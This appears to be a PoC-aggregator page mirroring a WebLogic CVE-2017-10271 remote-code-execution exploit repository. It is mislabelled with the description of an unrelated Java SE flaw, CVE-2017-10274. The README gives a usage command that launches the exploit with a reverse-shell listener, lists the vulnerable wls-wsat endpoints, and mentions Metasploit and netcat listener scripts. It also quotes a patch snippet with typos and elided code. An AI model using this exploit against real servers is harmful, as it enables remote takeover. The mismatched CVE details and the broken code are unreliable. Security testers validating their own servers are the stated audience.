CVE-2017-10274 PoC — Oracle Java SE组件安全漏洞

Source

https://github.com/5l1v3r1/CVE-2017-10274

Associated Vulnerability

Title:Oracle Java SE组件安全漏洞 (CVE-2017-10274)
Description:Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Smart Card IO). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE accessible data as well as unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N).

Description

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

Readme

# CVE-2017-10271

Weblogic wls-wsat Component Deserialization Vulnerability ([CVE-2017-10271](https://nvd.nist.gov/vuln/detail/CVE-2017-10271)) Detection and Exploitation Script

### Usage

```bash
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/
```

### Features

* Standalone Python script
  * Check functionality to see if any host is vulnerable
  * Exploit functionality for Linux targets
* Metasploit module
  * Check functionality to see if any host is vulnerable
  * Exploit functionality for all targets
* Scanner (./scanners)
  * Checks to see if hosts is vulnerable. Fully self-contained

## Legal Notices

You are responsible for the use of this script. Kevin Kirsche takes no responsibility for any actions taken using the code here. The code was created for teams looking to validate the security of their servers, not for malicious use.

## Thanks

Big thanks to Luffin for creating the original POC that this was based on https://github.com/Luffin/CVE-2017-10271

## Vulnerable URL's other than the one shown:

```
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11
```

## Related Vulnerability

[CVE 2017-3506](https://nvd.nist.gov/vuln/detail/CVE-2017-3506)

## Oracle's Patch

Source:

https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

```java
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
```

File Snapshot


 [4.0K]  /data/pocs/96c92e7b58e6bb655832536bd7b203af617c21f7
├── [9.6K]  CVE-2017-10271.py
├── [4.0K]  docker
│   └── [  89]  Dockerfile
├── [ 11K]  LICENSE
├── [4.0K]  listeners
│   ├── [  67]  nc-exploit-listener.sh
│   ├── [  85]  py2-check-listener.sh
│   └── [  81]  py3-check-listener.sh
├── [ 171]  msf-linux-runner.rc
├── [6.2K]  oracle_weblog_wsat_rce.rb
├── [4.0K]  original-poc
│   └── [3.7K]  original-poc.py
├── [2.7K]  README.md
├── [  77]  requirements.txt
├── [4.0K]  scanners
│   ├── [4.0K]  bin
│   │   ├── [ 10M]  CVE-2017-10271.release.1.1.0.amd64.darwin
│   │   ├── [8.0M]  CVE-2017-10271.release.1.1.0.amd64.dragonfly
│   │   ├── [8.0M]  CVE-2017-10271.release.1.1.0.amd64.freebsd
│   │   ├── [8.0M]  CVE-2017-10271.release.1.1.0.amd64.linux
│   │   ├── [8.0M]  CVE-2017-10271.release.1.1.0.amd64.netbsd
│   │   ├── [8.0M]  CVE-2017-10271.release.1.1.0.amd64.openbsd
│   │   ├── [8.0M]  CVE-2017-10271.release.1.1.0.amd64.solaris
│   │   └── [8.0M]  CVE-2017-10271.release.1.1.0.amd64.windows.exe
│   ├── [4.0K]  cmd
│   │   └── [5.1K]  root.go
│   ├── [4.0K]  libcve201710271
│   │   ├── [ 661]  banner.go
│   │   ├── [ 239]  config.go
│   │   ├── [ 819]  payload.go
│   │   ├── [1.1K]  request.go
│   │   ├── [ 174]  target.go
│   │   └── [ 393]  workers.go
│   ├── [ 11K]  LICENSE
│   ├── [ 724]  main.go
│   ├── [1.4K]  Makefile
│   ├── [1.1K]  README.md
│   └── [ 446]  scanner.sh
└── [ 581]  vulnerable_machine_setup.md

7 directories, 32 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!